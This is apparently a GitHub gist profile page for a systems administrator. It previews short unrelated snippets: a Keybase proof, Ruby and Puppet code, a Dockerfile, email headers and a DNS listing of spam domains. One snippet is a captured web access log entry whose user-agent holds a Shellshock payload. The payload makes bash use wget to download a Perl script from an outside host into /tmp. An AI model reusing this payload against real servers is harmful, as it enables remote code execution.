Skip to content

Instantly share code, notes, and snippets.

View ripienaar's full-sized avatar

R.I.Pienaar ripienaar

View GitHub Profile
### Keybase proof
I hereby claim:
* I am ripienaar on github.
* I am ripienaar (https://keybase.io/ripienaar) on keybase.
* I have a public key whose fingerprint is 132C 3894 D8D3 48ED B2B9 E9FF 02E5 780D F1BC 6F01
To claim this, I am signing this object:
/*
* The dance is complete and the flash bits have been lit. Toss
* the packet over the fence for processing, which may light up
* more flashers.
*/
/*
* Initially, we populate the island with all the rifraff peers
* that happen to be lying around. Those with seriously
{"time":"26/Sep/2014:05:35:36 +0100", "referer":"-", "method":"GET", "protocol":"HTTP/1.1", "url":"/cgi-sys/defaultwebpage.cgi", "remoteip":"91.200.84.22", "remotehost":"91.200.84.22", "status":"301", "useragent":"() { :;}; /bin/bash -c \"/usr/bin/wget http://singlesaints.com/firefile/temp?h=x.com -O /tmp/a.pl\""}
require 'rubygems'
require 'xmlsimple'
require 'yaml'
require 'pp'
hash = XmlSimple.xml_in('togo.xml')
points = {}
hash["point"].each do |p|
$ irb -r yaml
>> puts ([{},{}]).to_yaml
---
- {}
- {}
Return-Path: [email protected]
Received: from zimbra1.devco.net (LHLO zimbra1.devco.net) (80.85.85.122) by
zimbra1.devco.net with LMTP; Fri, 13 Feb 2015 19:15:26 +0000 (GMT)
Received: from zimbra1.devco.net (localhost [127.0.0.1])
by zimbra1.devco.net (Postfix) with ESMTPS id 056B168054
for <[email protected]>; Fri, 13 Feb 2015 19:15:26 +0000 (GMT)
Received: from zimbra1.devco.net (localhost [127.0.0.1])
by zimbra1.devco.net (Postfix) with ESMTPS id ED07368055
for <[email protected]>; Fri, 13 Feb 2015 19:15:25 +0000 (GMT)
Received: from mw1.devco.net (mw1.devco.net [178.79.157.154])
actnow.doubthealthproblem.org has address 162.255.119.254
availnow.mosttrackingsystem.us has address 162.255.119.254
cancelnow.nationalpublicissue.work has address 162.255.119.254
check.coreslimtummy.org has address 162.255.119.254
choose.beautydietlocal.work has address 162.255.119.254
choose.naturalhealthcareplan.org has address 162.255.119.254
decline.beautydietlocal.work has address 162.255.119.254
decline.naturalhealthcareplan.org has address 162.255.119.254
decline.toequalrefinancecost.org has address 162.255.119.254
disallow.bellyfatslower.us has address 162.255.119.254
FROM centos:7
MAINTAINER R.I.Pienaar "[email protected]"
WORKDIR /opt/gogs
RUN yum install -y git openssh-server unzip initscripts rsync; yum clean all
RUN yum -y update; yum clean all
RUN useradd --shell /bin/bash --system --comment gogits git
% docker run -ti --rm ripienaar/rbldnsd --inspect
Container management methods:
Container supports START method using command /srv/support/bin/start.sh
Container supports UPDATE method using command /srv/support/bin/update.sh
Container supports VALIDATE method using command /srv/support/bin/validate.sh
Metadata for image centos_base
Names:
class one {
$x = 1
two{"x": }
}
define two {
notice("notice: '${x}'")
notice(inline_template("inline template: '<%= @x %>'"))
}